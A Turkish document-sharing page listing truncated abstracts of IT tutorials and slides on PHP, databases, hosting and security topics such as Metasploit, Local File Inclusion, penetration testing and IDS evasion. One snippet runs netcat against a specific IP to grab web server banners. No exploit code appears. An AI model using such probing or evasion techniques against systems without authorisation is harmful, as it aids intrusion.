Ders Tanıtım Sunumu. Internet Programming II. Elbistan Meslek Yüksek Okulu 2012 2013 Bahar Yarıyılı. 26 Şub. 2013 Öğr. Gör. Ders Tanıtım Sunumu Internet Programming II Elbistan Meslek Yüksek Okulu 2012 2013 Bahar Yarıyılı 26 Şub. 2013 Öğr. Gör. Murat KEÇECİOĞLU PHP Nedir? Platformdan bağımsız (işletim Sistemi) dinamik web sayfaları

Detaylı

JAVASCRIPT JAVASCRIPT DİLİ

JAVASCRIPT JAVASCRIPT DİLİ JAVASCRIPT JAVASCRIPT DİLİ Netscape Navigator 2.0 ile birlikte geliştirilen JavaScript dili istemci taraflı (client-side) script dilidir. Web sayfalarında dinamik içerik sağlamak ya da kullanıcıyla iletişim

Detaylı

Oturum Öncesi Tanımlı Oturum Kimliği Çerezi Açığı Gökhan

Oturum Öncesi Tanımlı Oturum Kimliği Çerezi Açığı Gökhan Oturum Öncesi Tanımlı Oturum Kimliği Çerezi Açığı Gökhan Muharremoğlu Oturum Öncesi Tanımlı Oturum Kimliği Çerezi Açığı Oturum öncesi tanımlı oturum kimliği çerezi açığı, az bilinen ve dünya genelinde

Detaylı

ERİŞİM ENGELLEME DOS VE DDOS:

ERİŞİM ENGELLEME DOS VE DDOS: DoS nedir? ERİŞİM ENGELLEME DOS VE DDOS: Denial of service türkçesi erişim engelleme saldırısı olarak anlaşılmaktadır. Hedef bilgisayar ağının kaynaklarını kullanamayacak şekilde erişilmez kılınmasını

Detaylı

ORTA DOĞU TEKNİK ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI. Güvenlik ve Virüsler. ODTÜ BİDB İbrahim Çalışır, Ozan Tuğluk, Cengiz Acartürk 04.04.

ORTA DOĞU TEKNİK ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI. Güvenlik ve Virüsler. ODTÜ BİDB İbrahim Çalışır, Ozan Tuğluk, Cengiz Acartürk 04.04. Güvenlik ve Virüsler ODTÜ BİDB İbrahim Çalışır, Ozan Tuğluk, Cengiz Acartürk 04.04.2005 Bilgi güvenliği neden gerekli? Kişisel bilgi kaybı Üniversiteye ait bilgilerin kaybı Bilgiye izinsiz erişim ve kötüye

Detaylı

Veri Tabanı-I 1.Hafta

Veri Tabanı-I 1.Hafta Veri Tabanı-I 1.Hafta 2010-2011 Bahar Dönemi Mehmet Akif Ersoy Üniversitesi Meslek Yüksekokulu Burdur 2011 Muhammer İLKUÇAR 1 Veri ve Veri Tabanı Nedir? Veri Bir anlamı olan ve kaydedilebilen

Detaylı

Security Configuration Wizard ile güvenliği artırmak

Security Configuration Wizard ile güvenliği artırmak Security Configuration Wizard ile güvenliği artırmak Bu makalede sizlere Security Configuration Wizard kullanımını, bu tool sunucunun nasıl daha güvenli hale getirildiğini ve bu tool ile hazırlanan xml

Detaylı

SQL ALWAYS ON SİSTEMİNE YENİ CLUSTER NODE EKLENMESİ

SQL ALWAYS ON SİSTEMİNE YENİ CLUSTER NODE EKLENMESİ SQL ALWAYS ON SİSTEMİNE YENİ CLUSTER NODE EKLENMESİ Windows ve SQL Update seviyelerinin aynı olması gerekmektedir. Windows versiyonu aynı olmalıdır. Ayrıca Disk ve Disklerin içinde ki klasörler diğer SQL

Detaylı

Hedef Odaklı Sızma Testleri

Hedef Odaklı Sızma Testleri Hedef Odaklı Sızma Testleri Huzeyfe ÖNAL BGA Bilgi Güvenliği Bilgi Güvenliğinde E- Crime Turkey Sızma - Testleri/2012 Huzeyfe ÖNAL Kurumsal Güvenlik Hizmetleri Yöne;cisi BGA Bilgi

Detaylı

Mobile Sistemler ve Uygulama Güvenliği

Mobile Sistemler ve Uygulama Güvenliği Mobile Sistemler ve Uygulama Güvenliği @2014 Örnek Eğitim Notu bilgi@bga.com.tr Güvenlik Perspektifleri Hacking Saldırgan gözü, izinsiz Denetim Saldırgan gözü, izinli Önlem Sistem yöneticileri, geliştiriciler

Detaylı

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada. Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların

Detaylı

System Center Configuration Manager 2012 R2

System Center Configuration Manager 2012 R2 System Center Configuration Manager 2012 R2 Application Catalog Kullanımı Asil MUTLU Private Cloud Solution Expert Açıklama Merhabalar, Hazırlanan bu E-Book içerisinde System Center Configuration Manager

Detaylı

Deneyin Amacı: Ağ Güvenliğinin ve etik saldırının anlaşılması ve bunu sağlayan yöntemlerin ve araçların incelenmesi ve kullanımıdır.

Deneyin Amacı: Ağ Güvenliğinin ve etik saldırının anlaşılması ve bunu sağlayan yöntemlerin ve araçların incelenmesi ve kullanımıdır. Deneyin Amacı: Ağ Güvenliğinin ve etik saldırının anlaşılması ve bunu sağlayan yöntemlerin ve araçların incelenmesi ve kullanımıdır. Deney Hazırlık 1. Peneltrasyon testi nedir inceleyin. 2. Wireshark Programını

Detaylı

ÇALIŞMA SORULARI. 15. Linkin tıklanması durumunda sayfanın yeni pencerede açılmasını sağlayan HTML parametresi aşağıdakilerden hangisidir?

ÇALIŞMA SORULARI. 15. Linkin tıklanması durumunda sayfanın yeni pencerede açılmasını sağlayan HTML parametresi aşağıdakilerden hangisidir? ÇALIŞMA SORULARI 1. HTML nedir? a) Sayfa içindeki metinlerin tarayıcıda nasıl görüneceğini ve işlevsel olacağını düzenleyen işaret dilidir. b) Diğer sayfaları bağlayan linkler c) Nesneyi bağlayan linkler

Detaylı

Windows Şablon Oluşturma Kılavuzu. Cloudturk içerisinde dağıtmak üzere Windows SM şablonlarınızı oluşturma rehberi.

Windows Şablon Oluşturma Kılavuzu. Cloudturk içerisinde dağıtmak üzere Windows SM şablonlarınızı oluşturma rehberi. Windows Şablon Oluşturma Kılavuzu Cloudturk içerisinde dağıtmak üzere Windows SM şablonlarınızı oluşturma rehberi. İÇİNDEKİLER: 1. Sunucuyu Hazırlama... 2 2. Windows Yükleme... 3 3. Şablon Oluşturma...

Detaylı

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Metasploit Framework ile Güvenlik Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Metasploit

Detaylı

Exploit Geliştirme Altyapıları. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net

Exploit Geliştirme Altyapıları. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Exploit Geliştirme Altyapıları Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Önerilen Yazılımlar

Detaylı

Multi Domain Windows Hosting için Başlangıç Rehberi

Multi Domain Windows Hosting için Başlangıç Rehberi Türkiye Multi Domain Windows Hosting için Başlangıç Rehberi İçindekiler 1. Özellikler 2. Planlar ve Fiyatlar 3. Multi Domain Windows Hosting Giriş Yap 4. Multi Domain Windows Hosting i Kur Fiyat Oluştur

Detaylı

MaestroPanel Kurulum

MaestroPanel Kurulum MaestroPanel Kurulum 28.09.2011 Oğuzhan YILMAZ oguzhan@maestropanel.com Gereksinimler Windows Server 2008 R2 x64 Any Edition Web Platform Installer 3.0+ Desteklenen Yazılımlar MailEnable 5.x SQL Server

Detaylı

T.C. İSTANBUL ÜNİVERSİTESİ REKTÖRLÜĞÜ SÖZLEŞMELİ BİLİŞİM PERSONELİ SINAV DUYURUSU

T.C. İSTANBUL ÜNİVERSİTESİ REKTÖRLÜĞÜ SÖZLEŞMELİ BİLİŞİM PERSONELİ SINAV DUYURUSU T.C. İSTANBUL ÜNİVERSİTESİ REKTÖRLÜĞÜ SÖZLEŞMELİ BİLİŞİM PERSONELİ SINAV DUYURUSU Üniversitemiz Bilgi İşlem Daire Başkanlığı emrinde istihdam edilmek üzere, 375 sayılı Kanun Hükmünde Kararnamenin Ek 6

Detaylı

Local File Inclusion Nedir?

Local File Inclusion Nedir? Local File Inclusion Nedir? İlk Olarak anlamı işleyişi gibi işlemlerden başlı yalım LFI (Local File Inclusion) kelime anlamı olarak Local File İnclude (Serverdan dosya çağırma) işlemidir. Lfi açığı Php

Detaylı

Bölüm 10: PHP ile Veritabanı Uygulamaları

Bölüm 10: PHP ile Veritabanı Uygulamaları Bölüm 10: PHP ile Veritabanı Uygulamaları -231- Öğr.Gör. Serkan DİŞLİTAŞ 10.1. PHP PHP, platformdan bağımsız sunucu taraflı çalışan betik bir web programlama dilidir. PHP programlama dili ile MySQL, MSSQL,

Detaylı

GELİŞMİŞ İNTERNET UYGULAMALARI

GELİŞMİŞ İNTERNET UYGULAMALARI Ünite 1: HTML5 HTML nin kısa tarihçesi: GELİŞMİŞ İNTERNET UYGULAMALARI 1991 World Wide Web ve HTML 1 ortaya çıktı 1995 HTML 2.0 1997 HTML 3.7 1998 Web Standarts Project 1999 HTML 4.0 2000 XHTML 1.0 2004

Detaylı

08220 Internet Programcılığı II

08220 Internet Programcılığı II 08220 Internet Programcılığı II Internet Programming II Öğr.Gör. Murat KEÇECİOĞLU Elbistan Meslek Yüksekokulu Bilgisayar Teknolojileri Bölümü Şubat 2015 08220 Internet Programcılığı II Internet Programming

Detaylı

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR ozan.ucar@bga.com.tr

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR ozan.ucar@bga.com.tr Sızma Testlerinde İleri Düzey Teknikler Ozan UÇAR ozan.ucar@bga.com.tr Ankara 2012 Konuşmacı Hakkında Bilgi Güvenliği Danışmanı ve Eğitmen Bilgi Güvenliği AKADEMİSİ (www.bga.com.tr) Penetration Tester

Detaylı

PHP CodeIgniter MVC Framework

PHP CodeIgniter MVC Framework PHP CodeIgniter MVC Framework Akademik Bilişim 2011, İnönü Üniversitesi-Malatya İrfan KILIÇ Bilgisayar Mühendisi Kafkas Üniversitesi 2 Başlıklar PHP, PHP5 MVC, Framework Nedir? MVC ve Framework ün Avantaj,

Detaylı

Open Source Coding: Python

Open Source Coding: Python Bilkent Üniversitesi Özgür Yazılım ve İnternet Teknolojileri Kulübü Open Source Coding: Python Bölüm 1: Python a Giriş Python nedir? Genel amaçlı çok paradigmalı kolay okunabilirliği amaçlayan yüksek seviyeli

Detaylı

HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 20:10:36 GMT Server: Apache/2.2.22 (Debian)

HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 20:10:36 GMT Server: Apache/2.2.22 (Debian) 31.01.2014 1.gün sudo apt-get install netcat nc 193.255.255.248 80 -v GET / HTTP/1.0 POST / HTTP/1.0 OPTIONS / HTTP/1.0 HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 20:10:04 GMT Server: Apache/2.2.22 (Debian)

Detaylı

.com. Kurumsal Java. Özcan Acar 2009. com

.com. Kurumsal Java. Özcan Acar 2009. com . urumsal J Java ile Yüksek Performanslı Web Platformları Özcan Acar acar@unitedinter.net http://www.ozcanacar. http://www.kurumsalj urumsal Özcan Acar Hakkında public class OezcanAcar { public static

Detaylı

SQL 2005 SQL STUDIO MANAGER ACP YAZILIMI KURULUM KILAVUZU

SQL 2005 SQL STUDIO MANAGER ACP YAZILIMI KURULUM KILAVUZU SQL 2005 SQL STUDIO MANAGER ACP YAZILIMI KURULUM KILAVUZU Sayfa 1 / 18 KURULUMA BAŞLANMADAN ÖNCE YAPILMASI GEREKENLER : Sistem Özelliklerinden işletim sisteminin 32-bit mi yoksa 64-bit mi olduğu kontrol

Detaylı

Veri Tabanı-I 1.Hafta

Veri Tabanı-I 1.Hafta Veri Tabanı-I 1.Hafta 2015-2016 Bahar Dönemi Mehmet Akif Ersoy Üniversitesi Teknik Bilimler Meslek Yüksekokulu Burdur 2015 Yrd.Doç.Dr. M. İLKUÇAR 1Muhammer İLKUÇAR, MAKÜ-2011 BURDUR

Detaylı

İÇİNDEKİLER İÇİNDEKİLER KODLAB

İÇİNDEKİLER İÇİNDEKİLER KODLAB İÇİNDEKİLER V İÇİNDEKİLER 1 WEB UYGULAMALARI GÜVENLİĞİ 1 Başlangıç 1 Bug Researcher Nedir? 3 İyi Niyetli Bug Researcher 3 Kötü Niyetli Bug Researcher 3 Bug Researcher ve Güvenlik Açıkları 4 HTTP Nedir?

Detaylı

ModSecurity İle Web Güvenliği Ve May 6 th, 2007 Bunyamin Demir -Turkey Chapter Lead -WeBekci Project bunyamin@owasp.org Copyright 2007 The Foundation Permission is granted to copy, distribute and/or modify

Detaylı

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI HALİL DALABASMAZ PENETRATION TESTING SPECIALIST ŞUBAT 2015 BGA BİLGİ GÜVENLİĞİ LİMİTED ŞİRKETİ WWW.BGA.COM.TR İÇİNDEKİLER 1. GİRİŞ... 1 2. MICROSOFT

Detaylı

Belgenin yeni sürümlerine http://www.cehturkiye.com adresinden ulaşabilirsiniz.

Belgenin yeni sürümlerine http://www.cehturkiye.com adresinden ulaşabilirsiniz. Ön Söz Bu belge temel olarak Zimbra mail sunucu kurulumunu ele almaktadır. Belge mümkün olduğu kadar kısa ve basit tutulmuş ve en temel şekli ile zimbra kurulumu yaparak incelemeniz, denemeniz için gerekli

Detaylı

PHP 1. Hafta 1. Sunum

PHP 1. Hafta 1. Sunum PHP 1. Hafta 1. Sunum PHP101: PHP nedir? Bu dersten sonra bilecekleriniz PHP nedir? PHP ye neden ihtiyaç vardır? PHP nin gelişimi HTML, HTTP ve JS nedir? PHP yle alakası nedir? PHP nin uygulama alanları

Detaylı

Teknoloji Servisleri; (Technology Services)

Teknoloji Servisleri; (Technology Services) Antalya International University Teknoloji Servisleri; (Technology Services) Microsoft Ofis Yazılımları (Microsoft Office Software), How to Update Office 365 User Details How to forward email in Office

Detaylı

18.8.2014 ANET YAZILIM LOG YÖNETİMİ. Karşılaştırma Tablosu ANET YAZILIM

18.8.2014 ANET YAZILIM LOG YÖNETİMİ. Karşılaştırma Tablosu ANET YAZILIM 18.8.2014 ANET YAZILIM LOG YÖNETİMİ Karşılaştırma Tablosu ANET YAZILIM ANET LOG COLLECTOR SAFELOG CSL SureLog/Fauna SureSec Agent Gereksinimi Yok Yok Yok Yok Yok Anlık Hash ve Zaman Damgası Evet Evet Evet

Detaylı

Web Formlar ve Sayfalar Arasında Bilgi Gönderme. BATML İnternet Programcılığı 1

Web Formlar ve Sayfalar Arasında Bilgi Gönderme. BATML İnternet Programcılığı 1 Web Formlar ve Sayfalar Arasında Bilgi Gönderme BATML İnternet Programcılığı 1 Bazı web sitelerinde sayfalar arasında bilgi veya değişken göndermek gerekebilir. Gönderilen bu bilgi kullanıcı adı ve şifre

Detaylı

http://alikoker.name.tr

http://alikoker.name.tr MySQL PHP web geliştiricileri genel olarak database tercihlerini çok rahat sql komutları yardımıyla kontrol edilebilen MySQL den yana kullanılar. Özellikle PHP+MySQL+Apache üçlüsü performans olarak web

Detaylı

Web Uygulamaları Mimarileri ve Güvenliği

Web Uygulamaları Mimarileri ve Güvenliği Web Uygulamaları Mimarileri ve Güvenliği METU CCLUB erbil Karaman başlıklar... Web uygulama mimarileri Uygulama geliştirme ve framework kullanımı Güvenli web uygulamaları için öneriler baslamadan önce...

Detaylı

LINUX YAZ KAMPI 2014 WEB UYGULAMA GÜVENLİĞİ VE GÜVENLİ KOD GELİŞTİRME KAYNAK BELGESİ ZİNNUR YEŞİLYURT

LINUX YAZ KAMPI 2014 WEB UYGULAMA GÜVENLİĞİ VE GÜVENLİ KOD GELİŞTİRME KAYNAK BELGESİ ZİNNUR YEŞİLYURT LINUX YAZ KAMPI 2014 WEB UYGULAMA GÜVENLİĞİ VE GÜVENLİ KOD GELİŞTİRME KAYNAK BELGESİ ZİNNUR YEŞİLYURT EYLÜL 2014 BAŞLANGIÇ Bu belge ülkemizde web uygulama güvenliği ve güvenliği kod geliştirme hakkaında

Detaylı

Neden PHP? Tasarımcı, şirket ve kullanıcı gözüyle. 10 Ekim 2005 / DEÜ DESEM Seval ÖZBALCI 1

Neden PHP? Tasarımcı, şirket ve kullanıcı gözüyle. 10 Ekim 2005 / DEÜ DESEM Seval ÖZBALCI 1 Neden PHP? Tasarımcı, şirket ve kullanıcı gözüyle. 10 Ekim 2005 / DEÜ DESEM Seval ÖZBALCI 1 Temel Özellikler-I PHP Kodları HTML tagları içine gömülür. 10 Ekim 2005

Detaylı

Komut Satırının Gücü Adına!

Komut Satırının Gücü Adına! Komut Satırının Gücü Adına! Yapılan istatistiklere göre 2011 yılının son çeyreğinde Windows XP işletim sistemi ile Windows 7 işletim sistemi arasındaki kullanım oranları birbirine oldukça yakınken, 2012

Detaylı

Moodle Öğrenme Yönetim Sisteminin Üniversite Sistemlerine Entegrasyon Deneyimleri

Moodle Öğrenme Yönetim Sisteminin Üniversite Sistemlerine Entegrasyon Deneyimleri Moodle Öğrenme Yönetim Sisteminin Üniversite Sistemlerine Entegrasyon Deneyimleri İçerik 1.Giriş 2.Öğretim Yönetim Sistemleri 3.Moodle 4.Moodle Genel Sorun Çözümleri 5.Moodle Özelleştirme 6.Moodle Toplu

Detaylı

18.8.2014 ANET YAZILIM LOG YÖNETİMİ. Karşılaştırma Tablosu ANET YAZILIM

18.8.2014 ANET YAZILIM LOG YÖNETİMİ. Karşılaştırma Tablosu ANET YAZILIM 18.8.2014 ANET YAZILIM LOG YÖNETİMİ Karşılaştırma Tablosu ANET YAZILIM ANET LOG COLLECTOR SAFELOG CSL SureLog SureLog(Korelasyonlu) SureSec Agent Gereksinimi Yok Yok Yok Yok Yok Yok Anlık Hash ve Zaman

Detaylı

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ IDS,IPS,Firewall Atlatma Yöntemleri IDS NEDİR? Intrusion Detection System:Tehdit Tespit sistemi bir ağ cihazına gelebilecek

Detaylı

BEYAZ ŞAPKALI HACKER EĞİTİMİ (C.E.H)

BEYAZ ŞAPKALI HACKER EĞİTİMİ (C.E.H) 1 Beyaz Şapkalı Hacker eğitimi hackerların sistemlere sızmada kullandığı yöntemleri ve araçları detaylı ve uygulamalı bir şekilde anlatılarak proaktif güvenlik anlayışı kazandırma amaçlı bir eğitimdir.

Detaylı

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ SİSTEM HACKİNG: Windows Sistem Güvenlik Denetimi: Security Account Manager:Güvenlik Hesabı Yöneticisi windows'da yer alan sunucularda

Detaylı

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net Metasploit Framework ile Güvenlik Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Metasploit

Detaylı

PHP ye Giriş. Hidayet Doğan

PHP ye Giriş. Hidayet Doğan PHP ye Giriş Hidayet Doğan Türkiye PHP Grubu hdogan@hido.net Özet: PHP genellikle web programlama için kullanılan ve dünyada geniş bir kullanıma sahip, P dilleri ailesinden bir betik dilidir. Derleyicisi

Detaylı

Temel Linux Sunucusu Kurulumu

Temel Linux Sunucusu Kurulumu Temel Linux Sunucusu Kurulumu Kerem ERZURUMLU kerem@linux.org.tr http://www.penguen.net Hacettepe Üniversitesi Bilgisayar Bilimleri Mühendisliği Sunumun Amacı Katılımcılarımıza sunucu kurulumu ile ilgili

Detaylı

08221 Veri Tabanı II. Elbistan Meslek Yüksek Okulu 2012 2013 GÜZ Yarıyılı. 02 03 Eki. 2013 Çarş. Perş. Öğr. Gör. Murat KEÇECĠOĞLU

08221 Veri Tabanı II. Elbistan Meslek Yüksek Okulu 2012 2013 GÜZ Yarıyılı. 02 03 Eki. 2013 Çarş. Perş. Öğr. Gör. Murat KEÇECĠOĞLU 08221 Veri Tabanı II Elbistan Meslek Yüksek Okulu 2012 2013 GÜZ Yarıyılı 02 03 Eki. 2013 Çarş. Perş. Öğr. Gör. Murat KEÇECĠOĞLU SQL SERVER 2008 MANAGEMENT STUDİO SQL Server 2008 veritabanlarının grafiksel

Detaylı